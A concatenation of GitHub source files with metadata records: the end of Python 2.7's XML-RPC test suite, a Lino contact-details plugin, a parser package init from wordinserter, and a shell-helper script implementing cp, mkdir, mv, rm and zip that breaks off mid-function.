# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
    def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
if threading:
self.url = URL
else:
# Without threading, http_server() and http_multi_server() will not
            # be executed and URL is still equal to None. 'http://' is just
# enough to choose the scheme (HTTP)
self.url = 'http://'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with test_support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with test_support.captured_stdout() as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with test_support.EnvironmentVarGuard() as env, \
test_support.captured_stdout() as data_out, \
test_support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
        # Using the same test method in order to avoid all the data-passing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEquals(
int(re.search('Content-Length: (\d+)', handle).group(1)),
len(content))
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
def close(self):
pass
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_custom_user_agent\r\n", req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_host\r\n", req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_request\r\n", req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_content\r\n", req)
@test_support.reap_threads
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(KeepaliveServerTestCase1)
xmlrpc_tests.append(KeepaliveServerTestCase2)
try:
import gzip
xmlrpc_tests.append(GzipServerTestCase)
except ImportError:
pass #gzip not supported in this build
xmlrpc_tests.append(MultiPathServerTestCase)
xmlrpc_tests.append(ServerProxyTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
{
"content_hash": "9ec9d573113cab9f7b7cd1372eca3862",
"timestamp": "",
"source": "github",
"line_count": 1018,
"max_line_length": 88,
"avg_line_length": 37.97151277013752,
"alnum_prop": 0.6133747251325831,
"repo_name": "fkolacek/FIT-VUT",
"id": "2a3b2d97a5b0866ec0a8040b94bf709f1fadae75",
"size": "38655",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/test/test_xmlrpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
}
|
"""Adds models and methods to handle multiple phone numbers, email
addresses etc ("contact details") per partner. See
:doc:`/specs/phones`.
.. autosummary::
:toctree:
fixtures.demo2
"""
from lino.api import ad, _
class Plugin(ad.Plugin):
verbose_name = _("Contact Details")
partner_model = 'contacts.Partner'
def on_site_startup(self, site):
super(Plugin, self).on_site_startup(site)
if self.partner_model is None:
return
self.partner_model = site.models.resolve(self.partner_model)
from lino.mixins import Phonable
if not issubclass(self.partner_model, Phonable):
raise Exception("partner_model {} is not a Phonable".format(
self.partner_model))
def setup_explorer_menu(self, site, user_type, m):
# mg = self.get_menu_group()
mg = site.plugins.contacts
m = m.add_menu(mg.app_label, mg.verbose_name)
m.add_action('phones.ContactDetailTypes')
m.add_action('phones.ContactDetails')
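# Illustrative configuration sketch (assumes Lino's standard Plugin.configure
# API; 'contacts.Person' is a hypothetical model): a Site subclass could point
# this plugin at another Phonable partner model before startup, e.g.::
#
#     self.plugins.phones.configure(partner_model='contacts.Person')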
|
{
"content_hash": "c305963b64f32fa49716955fad0f734d",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 72,
"avg_line_length": 29.13888888888889,
"alnum_prop": 0.6320305052430887,
"repo_name": "lino-framework/xl",
"id": "17471fadeedcaf6e8b3182d0e0858a4b796df37f",
"size": "1163",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lino_xl/lib/phones/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "186625"
},
{
"name": "HTML",
"bytes": "1417287"
},
{
"name": "JavaScript",
"bytes": "1630929"
},
{
"name": "PHP",
"bytes": "40437"
},
{
"name": "Python",
"bytes": "2395471"
}
],
"symlink_target": ""
}
|
import abc
class ParseException(RuntimeError):
pass
class BaseParser(abc.ABC):
@abc.abstractmethod
def parse(self, content):
raise NotImplementedError()
from .html import HTMLParser
from .markdown import MarkdownParser
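# Illustrative sketch (hypothetical parser, not shipped with the package):
# a concrete parser only needs to implement parse().
#
#     class PlainTextParser(BaseParser):
#         def parse(self, content):
#             if not isinstance(content, str):
#                 raise ParseException('expected a string')
#             return content.splitlines()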
|
{
"content_hash": "8aa52453fc7b4dd10ed25ee3f61f4b42",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 36,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.7387755102040816,
"repo_name": "orf/wordinserter",
"id": "321d6a77a89a4b557fa0cf1cd292ad292327b94d",
"size": "245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wordinserter/parsers/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "14887"
},
{
"name": "Python",
"bytes": "79383"
}
],
"symlink_target": ""
}
|
import fnmatch
import glob
import optparse
import os
import posixpath
import shutil
import stat
import sys
import time
import zipfile
if sys.version_info < (2, 6, 0):
sys.stderr.write("python 2.6 or later is required run this script\n")
sys.exit(1)
def IncludeFiles(filters, files):
"""Filter files based on inclusion lists
  Return a list of files which match any of the Unix shell-style wildcards
provided, or return all the files if no filter is provided."""
if not filters:
return files
match = set()
for file_filter in filters:
match |= set(fnmatch.filter(files, file_filter))
return [name for name in files if name in match]
def ExcludeFiles(filters, files):
"""Filter files based on exclusions lists
Return a list of files which do not match any of the Unix shell-style
wildcards provided, or return all the files if no filter is provided."""
if not filters:
return files
match = set()
for file_filter in filters:
excludes = set(fnmatch.filter(files, file_filter))
match |= excludes
return [name for name in files if name not in match]
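# Illustrative example (hypothetical file names) of the two filters above:
#
#   IncludeFiles(['*.py'], ['a.py', 'b.txt'])  # -> ['a.py']
#   ExcludeFiles(['*.py'], ['a.py', 'b.txt'])  # -> ['b.txt']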
def CopyPath(options, src, dst):
"""CopyPath from src to dst
Copy a fully specified src to a fully specified dst. If src and dst are
  both files, the dst file is removed first to prevent error. If an include
  or exclude list is provided, the destination is first matched against that
filter."""
if options.includes:
if not IncludeFiles(options.includes, [src]):
return
if options.excludes:
if not ExcludeFiles(options.excludes, [src]):
return
if options.verbose:
print 'cp %s %s' % (src, dst)
# If the source is a single file, copy it individually
if os.path.isfile(src):
# We can not copy over a directory with a file.
if os.path.exists(dst):
if not os.path.isfile(dst):
msg = "cp: cannot overwrite non-file '%s' with file." % dst
raise OSError(msg)
# If the destination exists as a file, remove it before copying to avoid
# 'readonly' issues.
os.remove(dst)
# Now copy to the non-existent fully qualified target
shutil.copy(src, dst)
return
# Otherwise it's a directory, ignore it unless allowed
if os.path.isdir(src):
if not options.recursive:
print "cp: omitting directory '%s'" % src
return
# We can not copy over a file with a directory.
if os.path.exists(dst):
if not os.path.isdir(dst):
msg = "cp: cannot overwrite non-directory '%s' with directory." % dst
raise OSError(msg)
else:
# if it didn't exist, create the directory
os.makedirs(dst)
# Now copy all members
for filename in os.listdir(src):
srcfile = os.path.join(src, filename)
dstfile = os.path.join(dst, filename)
CopyPath(options, srcfile, dstfile)
return
def Copy(args):
"""A Unix cp style copy.
Copies multiple sources to a single destination using the normal cp
semantics. In addition, it support inclusion and exclusion filters which
allows the copy to skip certain types of files."""
parser = optparse.OptionParser(usage='usage: cp [Options] sources... dest')
parser.add_option(
'-R', '-r', '--recursive', dest='recursive', action='store_true',
default=False,
help='copy directories recursively.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'--include', dest='includes', action='append', default=[],
help='include files matching this expression.')
parser.add_option(
'--exclude', dest='excludes', action='append', default=[],
help='exclude files matching this expression.')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting SOURCE(s) and DEST.')
srcs = files[:-1]
dst = files[-1]
src_list = []
for src in srcs:
files = glob.glob(src)
if not files:
raise OSError('cp: no such file or directory: ' + src)
if files:
src_list.extend(files)
for src in src_list:
# If the destination is a directory, then append the basename of the src
# to the destination.
if os.path.isdir(dst):
CopyPath(options, src, os.path.join(dst, os.path.basename(src)))
else:
CopyPath(options, src, dst)
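# Illustrative invocation sketch (hypothetical paths), using the options
# defined above to copy a tree recursively while skipping compiled files:
#
#   Copy(['-r', '--exclude', '*.pyc', 'src_dir', 'dest_dir'])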
def Mkdir(args):
"""A Unix style mkdir"""
parser = optparse.OptionParser(usage='usage: mkdir [Options] DIRECTORY...')
parser.add_option(
'-p', '--parents', dest='parents', action='store_true',
default=False,
help='ignore existing parents, create parents as needed.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
options, dsts = parser.parse_args(args)
if len(dsts) < 1:
parser.error('ERROR: expecting DIRECTORY...')
for dst in dsts:
if options.verbose:
print 'mkdir ' + dst
try:
os.makedirs(dst)
except OSError:
if os.path.isdir(dst):
if options.parents:
continue
raise OSError('mkdir: Already exists: ' + dst)
else:
raise OSError('mkdir: Failed to create: ' + dst)
return 0
def MovePath(options, src, dst):
"""MovePath from src to dst
Moves the src to the dst much like the Unix style mv command, except it
only handles one source at a time. Because of possible temporary failures
  due to locks (such as anti-virus software on Windows), the function will retry
up to five times."""
  # If the destination is an existing directory, place the source inside it;
  # otherwise dst itself is the target and may be overwritten below.
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
  # If the destination exists, then remove it
if os.path.exists(dst):
if options.force:
Remove(['-vfr', dst])
if os.path.exists(dst):
raise OSError('mv: FAILED TO REMOVE ' + dst)
else:
raise OSError('mv: already exists ' + dst)
for _ in range(5):
try:
os.rename(src, dst)
return
except OSError as error:
print 'Failed on %s with %s, retrying' % (src, error)
time.sleep(5)
print 'Gave up.'
  raise OSError('mv: ' + str(error))
def Move(args):
parser = optparse.OptionParser(usage='usage: mv [Options] sources... dest')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'-f', '--force', dest='force', action='store_true',
default=False,
      help='force, do not error if files already exist.')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting SOURCE... and DEST.')
srcs = files[:-1]
dst = files[-1]
if options.verbose:
print 'mv %s %s' % (' '.join(srcs), dst)
for src in srcs:
MovePath(options, src, dst)
return 0
def Remove(args):
"""A Unix style rm.
  Removes the list of paths. Because of possible temporary failures due to locks
(such as anti-virus software on Windows), the function will retry up to five
times."""
parser = optparse.OptionParser(usage='usage: rm [Options] PATHS...')
parser.add_option(
'-R', '-r', '--recursive', dest='recursive', action='store_true',
default=False,
help='remove directories recursively.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'-f', '--force', dest='force', action='store_true',
default=False,
      help='force, do not error if files do not exist.')
options, files = parser.parse_args(args)
if len(files) < 1:
parser.error('ERROR: expecting FILE...')
try:
for pattern in files:
dst_files = glob.glob(pattern)
if not dst_files:
# Ignore non existing files when using force
if options.force:
continue
raise OSError('rm: no such file or directory: ' + pattern)
for dst in dst_files:
if options.verbose:
print 'rm ' + dst
if os.path.isfile(dst) or os.path.islink(dst):
for i in range(5):
try:
# Check every time, since it may have been deleted after the
# previous failed attempt.
if os.path.isfile(dst) or os.path.islink(dst):
os.remove(dst)
break
except OSError as error:
              if i == 4:
print 'Gave up.'
raise OSError('rm: ' + str(error))
print 'Failed remove with %s, retrying' % error
time.sleep(5)
if options.recursive:
for i in range(5):
try:
if os.path.isdir(dst):
shutil.rmtree(dst)
break
except OSError as error:
              if i == 4:
print 'Gave up.'
raise OSError('rm: ' + str(error))
print 'Failed rmtree with %s, retrying' % error
time.sleep(5)
except OSError as error:
print error
return 0
def MakeZipPath(os_path, isdir, iswindows):
"""Changes a path into zipfile format.
# doctest doesn't seem to honor r'' strings, so the backslashes need to be
# escaped.
>>> MakeZipPath(r'C:\\users\\foobar\\blah', False, True)
'users/foobar/blah'
>>> MakeZipPath('/tmp/tmpfoobar/something', False, False)
'tmp/tmpfoobar/something'
>>> MakeZipPath('./somefile.txt', False, False)
'somefile.txt'
>>> MakeZipPath('somedir', True, False)
'somedir/'
>>> MakeZipPath('../dir/filename.txt', False, False)
'../dir/filename.txt'
>>> MakeZipPath('dir/../filename.txt', False, False)
'filename.txt'
"""
zip_path = os_path
if iswindows:
import ntpath
# zipfile paths are always posix-style. They also have the drive
# letter and leading slashes removed.
zip_path = ntpath.splitdrive(os_path)[1].replace('\\', '/')
if zip_path.startswith('/'):
zip_path = zip_path[1:]
zip_path = posixpath.normpath(zip_path)
# zipfile also always appends a slash to a directory name.
if isdir:
zip_path += '/'
return zip_path
def OSMakeZipPath(os_path):
return MakeZipPath(os_path, os.path.isdir(os_path), sys.platform == 'win32')
def Zip(args):
"""A Unix style zip.
Compresses the listed files."""
parser = optparse.OptionParser(usage='usage: zip [Options] zipfile list')
parser.add_option(
'-r', dest='recursive', action='store_true',
default=False,
help='recurse into directories')
parser.add_option(
'-q', dest='quiet', action='store_true',
default=False,
help='quiet operation')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting ZIPFILE and LIST.')
dest_zip = files[0]
src_args = files[1:]
src_files = []
for src_arg in src_args:
globbed_src_args = glob.glob(src_arg)
if not globbed_src_args:
if not options.quiet:
print 'zip warning: name not matched: %s' % (src_arg,)
for src_file in globbed_src_args:
src_file = os.path.normpath(src_file)
src_files.append(src_file)
if options.recursive and os.path.isdir(src_file):
for root, dirs, files in os.walk(src_file):
for dirname in dirs:
src_files.append(os.path.join(root, dirname))
for filename in files:
src_files.append(os.path.join(root, filename))
zip_stream = None
# zip_data represents a list of the data to be written or appended to the
# zip_stream. It is a list of tuples:
# (OS file path, zip path/zip file info, and file data)
# In all cases one of the |os path| or the |file data| will be None.
# |os path| is None when there is no OS file to write to the archive (i.e.
# the file data already existed in the archive). |file data| is None when the
# file is new (never existed in the archive) or being updated.
zip_data = []
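  # Illustrative example (not from the original source): updating 'a.txt' in
  # an archive that already contains 'a.txt' and 'b.txt' would leave zip_data
  # holding entries roughly like:
  #   ('a.txt', 'a.txt', None)              # re-read from disk and rewritten
  #   (None, <ZipInfo for 'b.txt'>, bytes)  # carried over from the old archive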
new_files_to_add = [OSMakeZipPath(src_file) for src_file in src_files]
zip_path_to_os_path_dict = dict((new_files_to_add[i], src_files[i])
for i in range(len(src_files)))
write_mode = 'a'
try:
zip_stream = zipfile.ZipFile(dest_zip, 'r')
files_to_update = set(new_files_to_add).intersection(
